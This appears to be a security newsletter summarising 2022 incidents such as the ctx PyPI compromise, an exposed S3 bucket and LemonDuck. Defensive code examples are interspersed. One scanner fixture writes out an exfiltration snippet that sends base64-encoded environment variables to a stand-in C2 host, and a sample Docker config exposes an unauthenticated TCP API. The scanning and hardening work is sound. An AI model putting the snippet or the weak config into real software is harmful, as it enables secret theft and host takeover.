May 31, 2022

PyPI Package 'ctx' And PHP Library 'phpass' Compromised To Steal Environment Variables

May 24, 2022

PyPI package 'ctx' has been compromised by malicious actors to steal environment variables. The package, which typically gets over 22,000 downloads a week, had its code altered to collect environment variables and send them to a C2 after base64 encoding them. In addition to the PyPI package, a fork of PHP library 'phpass' was also altered similarly to retrieve AWS developer secrets and send them to the same C2 address as the ctx package. 

Data Security Perspective: For users of ctx, older versions of the package do not contain the malicious code. However, for the newer versions 0.2.2, 0.2.6, and above, users should exercise caution and can inspect the installed source for the malicious code. For users of phpass, the package appears to have been remedied to stop the attack.
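The inspection suggested above can be automated. The following is an added example (not code from the ctx project or from the original article) that parses each Python file of an unpacked package with the standard `ast` module and flags files that combine the three behaviours the story describes: reading the process environment, base64-encoding data, and making a network call. The `SUSPECT` and `BENIGN` strings are constructed fixtures for the scanner, not the real ctx code; the indicator name sets are assumptions you would tune for your own environment.

```python
import ast
import os
from typing import Dict, List, Set

# Indicators checked in each module's AST. A file that combines all three
# behaviours (reads the process environment, encodes the result, and talks to
# the network) deserves a manual look before the package is installed or upgraded.
ENV_NAMES = {"environ", "getenv"}                                   # os.environ / os.getenv
ENCODE_NAMES = {"b64encode", "urlsafe_b64encode", "b32encode", "b16encode"}
NETWORK_MODULES = {"requests", "urllib", "urllib3", "http", "httpx", "socket"}


def _dotted_name(node: ast.AST) -> str:
    """Render an attribute chain such as requests.post as 'requests.post'."""
    parts: List[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def scan_source(src: str) -> Dict[str, Set[str]]:
    """Return the environment, encoding and network indicators found in one module."""
    findings: Dict[str, Set[str]] = {"env": set(), "encode": set(), "network": set()}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings["network"].add(alias.name)
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in NETWORK_MODULES:
                findings["network"].add(node.module)
        elif isinstance(node, ast.Attribute):
            name = _dotted_name(node)
            if node.attr in ENV_NAMES:
                findings["env"].add(name)
            if node.attr in ENCODE_NAMES:
                findings["encode"].add(name)
            if name.split(".")[0] in NETWORK_MODULES:
                findings["network"].add(name)
        elif isinstance(node, ast.Name):          # covers 'from os import environ' style
            if node.id in ENV_NAMES:
                findings["env"].add(node.id)
            if node.id in ENCODE_NAMES:
                findings["encode"].add(node.id)
    return findings


def is_suspicious(findings: Dict[str, Set[str]]) -> bool:
    """All three behaviours in one file is the pattern worth escalating to a human."""
    return all(findings.values())


def scan_package(root: str) -> Dict[str, Dict[str, Set[str]]]:
    """Scan every .py file under an unpacked package directory; return only suspicious files."""
    hits: Dict[str, Dict[str, Set[str]]] = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.endswith(".py"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                try:
                    findings = scan_source(fh.read())
                except SyntaxError:
                    continue                       # not valid Python; skip rather than crash
            if is_suspicious(findings):
                hits[path] = findings
    return hits


# Constructed fixtures for the scanner (not the real ctx code).
SUSPECT = '''
import os, base64, requests

def _ping():
    blob = base64.b64encode(str(dict(os.environ)).encode())
    requests.post("http://c2.example.invalid/collect", data=blob)
'''

BENIGN = '''
import os

def data_dir():
    return os.environ.get("CTX_HOME", os.path.expanduser("~/.ctx"))
'''
```

Run `scan_package()` against a downloaded and extracted sdist or wheel before it is installed; a hit lists the exact attribute chains that triggered it so the reviewer can jump straight to the lines in question. Reading `os.environ` alone is normal for most packages, which is why only the combination is reported.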

US Charity Exposed Users' Sensitive Images

May 11, 2022

Researchers from SafetyDetectives have uncovered a misconfigured AWS S3 bucket belonging to Breastcancer.org, a Pennsylvania breast cancer charity. The bucket, which was left unsecured, contained over 150,000 files, or 150GB of data. The data included user avatars and images users had posted, including private images containing nudity that were shared for medical purposes. In addition, the EXIF metadata in the images was still intact, which includes GPS location and device details. The exposed bucket was discovered in November 2021 and was secured as of May 2022.

Data Security Perspective: Cloud misconfigurations pose a massive risk to organizations and can have severe consequences. Organizations should ensure security policies are followed in order to prevent data exposure. Solutions such as Open Raven or Magpie can discover and alert about exposed data, along with other security policy violations.

Related Magpie Rules: aws-storage-s3-bucket-default-lock-enabled | aws-storage-s3-bucket-level-public-access-prohibited | aws-iam-and-security-iam-attached-policies | aws-security-best-practices
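Beyond locking down the bucket, the EXIF detail in the story is a separate defence: user-uploaded images should have their metadata removed before they are stored. The following added example (not from the article or from any of the products it mentions) walks the JPEG marker segments with only the standard library and drops every Exif APP1 segment, which is where GPS coordinates and device details live, while leaving the JFIF header, quantisation tables and the compressed image data untouched. `build_sample_jpeg()` is a constructed fixture with the right marker structure, not a decodable photograph.

```python
import struct
from typing import List, Tuple

EXIF_HEADER = b"Exif\x00\x00"          # payload prefix of an Exif APP1 segment


def _header_segments(jpeg: bytes) -> Tuple[List[Tuple[int, int, int]], int]:
    """Walk the marker segments that precede the scan data.

    Returns ([(marker, start, end), ...], offset_of_SOS). Everything from the
    SOS marker onward is entropy-coded image data and is copied through untouched.
    """
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    segments: List[Tuple[int, int, int]] = []
    pos = 2
    while pos + 2 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = jpeg[pos + 1]
        if marker == 0xDA:                                   # SOS: header section is done
            return segments, pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:         # TEM / RSTn carry no length field
            segments.append((marker, pos, pos + 2))
            pos += 2
            continue
        if pos + 4 > len(jpeg):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])   # length counts its own 2 bytes
        end = pos + 2 + length
        if end > len(jpeg):
            raise ValueError("truncated segment")
        segments.append((marker, pos, end))
        pos = end
    raise ValueError("no SOS marker found")


def _is_exif(jpeg: bytes, marker: int, start: int) -> bool:
    return marker == 0xE1 and jpeg[start + 4:start + 10] == EXIF_HEADER


def has_exif(jpeg: bytes) -> bool:
    """Quick check to run over a bucket listing: does this object still carry Exif?"""
    segments, _ = _header_segments(jpeg)
    return any(_is_exif(jpeg, m, s) for m, s, _e in segments)


def strip_exif(jpeg: bytes) -> bytes:
    """Return a copy of the JPEG with every Exif APP1 segment (GPS, device model, ...) removed."""
    segments, sos = _header_segments(jpeg)
    out = bytearray(jpeg[:2])
    for marker, start, end in segments:
        if not _is_exif(jpeg, marker, start):
            out += jpeg[start:end]
    out += jpeg[sos:]
    return bytes(out)


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg() -> bytes:
    """Constructed fixture: a minimal JPEG marker layout carrying an Exif APP1 segment.

    It is not a decodable picture, only the structure the stripper operates on.
    """
    app0 = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    app1 = _segment(0xE1, EXIF_HEADER + b"II*\x00\x08\x00\x00\x00" + b"\x00\x00")  # empty TIFF IFD
    dqt = _segment(0xDB, b"\x00" + bytes(64))
    sos = _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    return b"\xff\xd8" + app0 + app1 + dqt + sos + b"\x12\x34\x56" + b"\xff\xd9"
```

`strip_exif()` is idempotent, so it is safe to run in an upload pipeline and again as a batch job over existing objects; `has_exif()` makes a cheap audit check for objects that slipped through. Other embedded metadata (XMP in APP1 without the Exif header, IPTC in APP13) is deliberately left alone here and would need its own rule.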

Wiz Research Discovers "ExtraReplica"— A Cross-Account Database Vulnerability In Azure PostgreSQL

April 28, 2022

Researchers at Wiz have discovered a vulnerability in the Microsoft Azure Database for PostgreSQL Flexible Server. The vulnerability, named "#ExtraReplica", bypasses tenant isolation, enabling unauthorized read access to other customers' PostgreSQL databases. Malicious actors could gain unauthorized access to other databases by exploiting a bug in the Flexible Server authentication process that allows elevated privileges, and then using an improperly anchored regex to gain access to the other database.

Data Security Perspective: Microsoft responded to the vulnerability with patches for the Flexible Server released in February 2022 and said that no customers had been affected. As noted by Wiz, this vulnerability highlights the lack of a cloud vulnerability database, similar to the CVE database, which would enable users to track and respond to vulnerabilities.
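The "improperly anchored regex" in this story is an instance of a general pitfall that is worth seeing side by side. The following is an added example, not code from Wiz's research or from Azure: a hypothetical hostname allow-list (`TRUSTED_PATTERN` and the `db.example.net` suffix are invented) checked three ways. `re.match` only anchors the start of the string, `^...$` still lets a trailing newline through, and `re.fullmatch` is the form that accepts exactly the intended set.

```python
import re

# Hypothetical allow-list: a single label directly under a trusted suffix.
TRUSTED_PATTERN = r"[a-z0-9-]+\.db\.example\.net"


def is_trusted_host_unanchored(host: str) -> bool:
    """Vulnerable form: re.match anchors only the start, so trailing text is never examined."""
    return re.match(TRUSTED_PATTERN, host) is not None


def is_trusted_host_dollar(host: str) -> bool:
    """Still subtly wrong: '$' also matches just before a trailing newline."""
    return re.match("^" + TRUSTED_PATTERN + "$", host) is not None


def is_trusted_host_anchored(host: str) -> bool:
    """Hardened form: the whole string must match the pattern, nothing before or after."""
    return re.fullmatch(TRUSTED_PATTERN, host) is not None


def compare(host: str) -> dict:
    """Show how each variant classifies one input; useful for writing the regression tests."""
    return {
        "unanchored": is_trusted_host_unanchored(host),
        "dollar": is_trusted_host_dollar(host),
        "fullmatch": is_trusted_host_anchored(host),
    }
```

When reviewing a check like this, the test cases to keep are the ones where the three functions disagree: any extra suffix after the trusted domain, and a trailing newline. If an allow-list check is reachable from untrusted input, only the `fullmatch` form (or `\A...\Z`) expresses the intent.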

Heroku Admits To Customer Database Hack After OAuth Token Theft

May 5, 2022

After last month's security alert from GitHub that threat actors were stealing OAuth tokens from Heroku and Travis CI, Heroku announced the same stolen token was used to breach its customer database. The company announced the threat actor accessed and exfiltrated customer passwords from a customer database. Heroku initially reported that the stolen OAuth tokens could only give threat actors access to GitHub repositories, not to Heroku customer accounts.

LemonDuck Targets Docker For Cryptomining Operations

April 21, 2022

The cryptomining botnet LemonDuck has been targeting Docker to mine cryptocurrency on Linux. Exposed Docker APIs are targeted with a custom entry point that downloads a disguised Bash script. The Bash script then sets up a cronjob which downloads the payload and enables it to kill processes, daemons, and known network connections, as well as remove competing cryptominers. The payload downloads and runs the XMRig cryptominer.

Data Security Perspective: The misuse of exposed Docker APIs is increasing, especially for cryptomining. Users should ensure they have the correct security configurations when using Docker. 
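The exposure LemonDuck relies on is usually a daemon listening on a plain TCP socket. The following added example (not from the article or from Docker's own tooling) audits a parsed `/etc/docker/daemon.json`: it flags any `tcp://` listener that is not protected by mutual TLS, and warns when a TLS-protected listener is bound to every interface. `hosts`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` are real daemon.json keys; the two configurations at the bottom are constructed, with the weak setting beside the corrected one.

```python
import json
from typing import Any, Dict, List
from urllib.parse import urlsplit

TLS_KEYS = ("tlsverify", "tlscacert", "tlscert", "tlskey")


def audit_docker_daemon(config: Dict[str, Any]) -> List[str]:
    """Return findings for a parsed daemon.json; an empty list means no remote API exposure found."""
    findings: List[str] = []
    # dockerd defaults to the local Unix socket when "hosts" is absent.
    hosts = config.get("hosts", ["unix:///var/run/docker.sock"])
    # Mutual TLS needs tlsverify plus all three certificate paths.
    tls_ok = bool(config.get("tlsverify")) and all(config.get(k) for k in TLS_KEYS)
    for host in hosts:
        url = urlsplit(host)
        if url.scheme != "tcp":
            continue                      # unix:// and fd:// are local-only
        if not tls_ok:
            findings.append(
                f"{host}: Docker API listens on TCP without mutual TLS; "
                "anyone who can reach the port controls the host"
            )
        elif url.hostname in ("0.0.0.0", "::", None):
            findings.append(
                f"{host}: TLS-protected API bound to all interfaces; "
                "bind to a specific address or restrict it with a firewall"
            )
    return findings


def audit_daemon_json(text: str) -> List[str]:
    """Convenience wrapper for the raw file contents."""
    return audit_docker_daemon(json.loads(text))


# Constructed configurations, not taken from any real host.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""
```

Note that `-H` flags passed to `dockerd` on the command line or in a systemd unit are not visible in daemon.json, so a complete audit also checks the running process arguments; the file check above is the part that is easy to run fleet-wide from configuration management.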

Medical Software Firm Fined €1.5M For Leaking Data Of 490k Patients

April 28, 2022

Medical software company Dedalus Biology has been fined 1.5 million Euros after exposing the PII of nearly 500,000 patients. The data, which came from a leaked database, included full names, genetic information, medical information such as medical conditions, and social security numbers. The leak appears to go back to March 2020, with parts of the dataset sold online in 2021. In total, Dedalus Biology was charged with three violations of GDPR, totaling 1.5 million Euros.

Data Security Perspective: Compliance is important for companies, especially those operating in Europe, as data exposure can lead to massive fines. Correct authentication and encryption are necessary for organizations, especially when handling sensitive data. 

Report: FOX Exposed Nearly 13 Million Content Management Records Online

An exposed database belonging to FOX has been discovered by security researchers from Website Planet. The database contained 58 GB of information, with nearly 13,000,000 records, including internal emails, employee ID numbers, IP addresses, host information, and cast and crew names, among other details. While it is not apparent how long the database was exposed, it has since been secured. 

Data Security Perspective: Having the correct configurations for databases and cloud resources is vital for organizations. This story highlights how even large corporations with security teams can be vulnerable to data exposure. 

Other News

Microsoft Finds New Elevation of Privilege Linux Vulnerability, Nimbuspwn

Below The Surface: Group-IB Identified 308,000 Exposed Databases In 2021

NPM Flaw Let Attackers Add Anyone As Maintainer To Malicious Packages

New Black Basta Ransomware Springs Into Action With a Dozen Breaches

Jira Vulnerability CVE-2022-0540

Cisco Umbrella Virtual Appliance Static SSH Host Key Vulnerability

Critical Argo CD Vulnerability Could Allow Attackers Admin Privileges

Rogue Cloud Users Could Sabotage Fellow Off Prem Tenants Via Critical Flux Flaw

A Closer Look At Eternity Malware

Pharmacy Giant Hit By Data Breach Affecting 3.6 Million

Highlighted Security Tool

Anchore Engine is an open-source tool that analyzes container images against user-customizable policies. In addition, Anchore also evaluates vulnerabilities in the container images. Anchore Engine can be used within multiple orchestration platforms such as Docker, Kubernetes, and Amazon ECS, among others.

Cloud Security Bulletins

GCP